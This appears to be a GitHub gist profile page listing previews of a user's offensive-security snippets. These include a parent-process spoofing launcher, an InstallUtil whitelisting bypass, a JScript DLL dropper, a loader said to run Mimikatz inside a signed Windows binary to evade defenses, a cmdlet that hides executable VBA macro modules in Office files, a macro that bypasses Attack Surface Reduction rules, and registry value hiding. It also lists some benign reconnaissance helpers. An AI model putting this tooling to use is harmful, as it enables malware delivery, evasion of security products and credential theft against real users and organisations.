Skip to content

Instantly share code, notes, and snippets.

View TechByTom's full-sized avatar

TechByTom

14 followers · 158 following
View GitHub Profile
@TechByTom
TechByTom / all.txt
Created March 28, 2019 19:58 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@TechByTom
TechByTom / gethelp.cs
Created May 13, 2019 15:15
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@TechByTom
TechByTom / process_spoof.c
Created June 1, 2019 23:37
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
@TechByTom
TechByTom / dynwrapx.js
Created June 2, 2019 19:47
DynamicWrapperX Dropper - Code Registration Example
//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);
// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac
@TechByTom
TechByTom / Tasks.cs
Created August 3, 2019 04:25
BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe, Cause likely your .NET defenses are bullshit and people are being deceived...Assume Security Products will fail...
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@TechByTom
TechByTom / get_certs.sh
Created August 4, 2019 19:19 — forked from mikeabreu/get_certs.sh
Certificate Transparency Bash Functions
#!/bin/bash
# Add these functions to your .bashrc or .zshrc and use from your terminal.
get_certs_domains() {
# Credit goes to Ronnie Flathers, taken from https://twitter.com/ropnop/status/972151279463124994
curl -s https://crt.sh\?q\=%25.$1 | awk -v pattern="<TD>.*$1" '$0 ~ pattern {gsub("<[^>]*>","");gsub(//,""); print}' | sort -u
}
get_certs() {
curl -s https://crt.sh\?q\=%25.$1 | awk '/\?id=[0-9]*/{nr[NR]; nr[NR+1]; nr[NR+3]; nr[NR+4]}; NR in nr' | sed 's/<TD style="text-align:center"><A href="?id=//g' | sed 's#">[0-9]*</A></TD>##g' | sed 's#<TD style="text-align:center">##g' | sed 's#</TD>##g' | sed 's#<TD>##g' | sed 's#<A style=["a-z: ?=0-9-]*>##g' | sed 's#</A>##g' | sed 'N;N;N;s/\n/\t\t/g'
}
@TechByTom
TechByTom / gist:9b95499c0511418383d8ab651018b85f
Created August 14, 2019 04:17
List all AWS IPs
https://ip-ranges.amazonaws.com/ip-ranges.json
@TechByTom
TechByTom / Invoke-HideVBAModule.psm1
Created September 3, 2019 14:54 — forked from williamknows/Invoke-HideVBAModule.psm1
PowerShell cmdlet for hiding VBA modules in Microsoft Office documents
<#
.Synopsis
Used to hide VBA modules from the VBA editor in Microsoft Office documents/templates, but still have them contain executable code.
Script created by William Knowles. @william_knows
Technique originally found by Thegrideon Software: https://www.thegrideon.com/vba-internals.html
.Description
This cmdlet facilitates editing the Word/Excel documents/templates to remove references to VBA modules.
For the older compatibility formats you can edit the file directly with a hex editor and remove module references.
For the newer XML formats that use zip files, you need to unzip them, and edit the vbaProject.bin file.
@TechByTom
TechByTom / ASR Rules Bypass.vba
Created September 16, 2019 22:30 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@TechByTom
TechByTom / ironregistry.py
Created October 1, 2019 00:28 — forked from Graph-X/ironregistry.py
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 Im mr meeseeks',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')